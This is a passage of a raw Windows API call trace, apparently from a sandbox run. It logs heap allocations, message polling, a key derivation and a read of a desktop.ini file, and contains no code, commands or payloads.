hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.299] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0268.307] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0268.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0268.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.315] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.315] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.316] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.316] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.316] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.316] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0268.317] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0268.317] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0268.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.318] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.318] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.318] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.318] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.318] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0268.319] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.319] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0268.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.319] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0268.320] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.320] 